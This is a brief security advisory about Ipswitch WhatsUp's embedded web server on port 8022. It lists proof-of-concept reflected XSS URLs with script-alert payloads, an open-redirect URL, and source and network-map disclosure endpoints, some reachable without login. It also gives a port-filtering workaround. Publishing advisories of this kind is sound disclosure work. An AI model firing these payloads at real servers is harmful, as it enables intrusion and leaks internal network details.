ipswitchXSS.txt

`WhatsUp is a tool from Ipswitch to monitor application and network,  
embedding a custom web server on port 8022.  
  
Description:  
  
This custom web server is prone to multiple flaws.  
  
-as authenticated user:  
  
*src disclosure  
http://server:8022/NmConsole/Login.asp.  
  
*there are many XSS flaws, as  
http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("me");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT>  
http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=32&btnPing=Ping  
  
*redirection  
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr  
  
-not being authenticated:  
  
*src disclosure  
http://server:8022/NmConsole/Login.asp.  
  
*network nodes information disclosure (name, internal addr, service)  
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0  
  
  
  
The weaknesses have been confirmed in version 2006, source disclosure  
in version 2005 and 2005 SP1 too.  
Other versions may also be affected.  
  
No response from vendor.  
  
Solution:  
-Filtered TCP port 8022, ask a patch from vendor if you are a registered user  
-Keep an eye on an opensource project: http://gnms.rubyforge.org  
  
  
David Maciejak  
`